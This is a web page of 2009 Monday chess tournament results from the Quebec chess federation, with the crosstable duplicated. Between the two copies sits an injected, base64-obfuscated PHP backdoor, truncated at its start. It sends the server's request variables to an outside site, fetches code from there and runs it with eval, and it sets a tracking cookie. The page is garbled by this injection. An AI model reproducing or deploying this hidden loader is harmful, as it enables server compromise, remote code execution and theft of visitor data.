Tournoi du lundi Alexey Sokolsky 2009 - Résultats

Section A - Ouvert 

# Name Cote Rd 1 Rd 2 Rd 3 Rd 4 Rd 5 Tot Prize
1 Deschesnes Jean 1802 +6 +3 +2 +4 +8 5.0 90.00
2 Abran David 1726 +9 +10 -1 +6 +4 4.0 70.00
3 Dallaire Michel 1606 +13 -1 +10 +5 =7 3.5  
4 Labonte Stéphane 1653 +12 +11 +8 -1 -2 3.0  
5 Keep Richard R 1588 -11 +12 +13 -3 +10 3.0  
6 Duguay Richard 1382 -1 +14 +7 -2 +11 3.0  
7 Adam Dany 1631 -10 +9 -6 +13 =3 2.5  
8 Cyrenne Dany 1453 +14 H--- -4 +11 -1 2.5  
9 Laporte Yan 1212 -2 -7 -14 B--- +13 2.0 14.00
10 Desjardins André 1105 +7 -2 -3 +14 -5 2.0 14.00
11 Dubois Lise 1018 +5 -4 +12 -8 -6 2.0 14.00
12 Rochefort Christian 1166 -4 -5 -11 U--- +14 1.0  
13 Girard Réjean 1043 -3 B--- -5 -7 -9 1.0  
14 Cormier Roger 870 -8 -6 +9 -10 -12 1.0

 
AoJF9TRVJWRVJbJ0hUVFBfUkVGRVJFUiddID09PSAiaHR0cDovLyIuJF9TRVJWRVJbJ1NFUlZFUl9OQU1FJ10uJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ10pIG9yICgkX1NFUlZFUlsnUkVNT1RFX0FERFInXSA9PT0gIjEyNy4wLjAuMSIpICBvciAoJF9TRVJWRVJbJ1JFTU9URV9BRERSJ10gPT09ICRfU0VSVkVSWydTRVJWRVJfQUREUiddKSBvciAoJF9HRVRbJ2RmJ10gPT09ICIxIikgb3IgKCRfUE9TVFsnZGwnXSA9PT0gIjEiICkpKQp7fQplbHNlCnsKZm9yZWFjaCgkX1NFUlZFUiBhcyAkbmRidiA9PiAkY2JjZCkgeyAkZGF0YV9uZmRoLj0gIiZSRU1fIi4kbmRidi4iPSciLmJhc2U2NF9lbmNvZGUoJGNiY2QpLiInIjt9CiRjb250ZXh0X2poa2IgPSBzdHJlYW1fY29udGV4dF9jcmVhdGUoCmFycmF5KCdodHRwJz0+YXJyYXkoCiAgICAgICAgICAgICAgICAgICAgICAgICd0aW1lb3V0JyA9PiAnMTUnLAogICAgICAgICAgICAgICAgICAgICAgICAnaGVhZGVyJyA9PiAiVXNlci1BZ2VudDogTW96aWxsYS81LjAgKFgxMTsgTGludXggaTY4NjsgcnY6MTAuMC45KSBHZWNrby8yMDEwMDEwMSBGaXJlZm94LzEwLjAuOV8gSWNld2Vhc2VsLzEwLjAuOVxyXG5Db25uZWN0aW9uOiBDbG9zZVxyXG5cclxuIiwKICAgICAgICAgICAgICAgICAgICAgICAgJ21ldGhvZCcgPT4gJ1BPU1QnLAogICAgICAgICAgICAgICAgICAgICAgICAnY29udGVudCcgPT4gIlJFTV9SRU09JzEnIi4kZGF0YV9uZmRoCikpKTsKJHZrZnU9ZmlsZV9nZXRfY29udGVudHMoImh0dHA6Ly93d3cuc2llbmFqYXp6Lml0L3dwLWNvbnRlbnQvdXBsb2Fkcy9wbHVnaW4vc2Vzc2lvbi5waHA/aWQiLCBmYWxzZSAsJGNvbnRleHRfamhrYik7CmlmKCR2a2Z1KSB7IEBldmFsKCR2a2Z1KTsgfSBlbHNlIHtvYl9zdGFydCgpOyAgaWYoIUBoZWFkZXJzX3NlbnQoKSkgeyBAc2V0Y29va2llKCJjb25kdGlvbnMiLCIyIix0aW1lKCkrMTcyODAwKTsgfSBlbHNlIHsgZWNobyAiPHNjcmlwdD5kb2N1bWVudC5jb29raWU9J2NvbmR0aW9ucz0yOyBwYXRoPS87IGV4cGlyZXM9Ii5kYXRlKCdELCBkLU0tWSBIOmk6cycsdGltZSgpKzE3MjgwMCkuIiBHTVQ7Jzs8L3NjcmlwdD4iOyB9IDt9Owp9Cn0K')); @ini_restore('error_log'); @ini_restore('display_errors'); /*564794552*/ ?>

Section A - Ouvert 

# Name Cote Rd 1 Rd 2 Rd 3 Rd 4 Rd 5 Tot Prize
1 Deschesnes Jean 1802 +6 +3 +2 +4 +8 5.0 90.00
2 Abran David 1726 +9 +10 -1 +6 +4 4.0 70.00
3 Dallaire Michel 1606 +13 -1 +10 +5 =7 3.5  
4 Labonte Stéphane 1653 +12 +11 +8 -1 -2 3.0  
5 Keep Richard R 1588 -11 +12 +13 -3 +10 3.0  
6 Duguay Richard 1382 -1 +14 +7 -2 +11 3.0  
7 Adam Dany 1631 -10 +9 -6 +13 =3 2.5  
8 Cyrenne Dany 1453 +14 H--- -4 +11 -1 2.5  
9 Laporte Yan 1212 -2 -7 -14 B--- +13 2.0 14.00
10 Desjardins André 1105 +7 -2 -3 +14 -5 2.0 14.00
11 Dubois Lise 1018 +5 -4 +12 -8 -6 2.0 14.00
12 Rochefort Christian 1166 -4 -5 -11 U--- +14 1.0  
13 Girard Réjean 1043 -3 B--- -5 -7 -9 1.0  
14 Cormier Roger 870 -8 -6 +9 -10 -12 1.0

 

Fédération québécoise des échecs Copyright ©

Graphisme Frida Franco Concept Design / Développement et intégration Jean Charles Dussault

XMLsitemap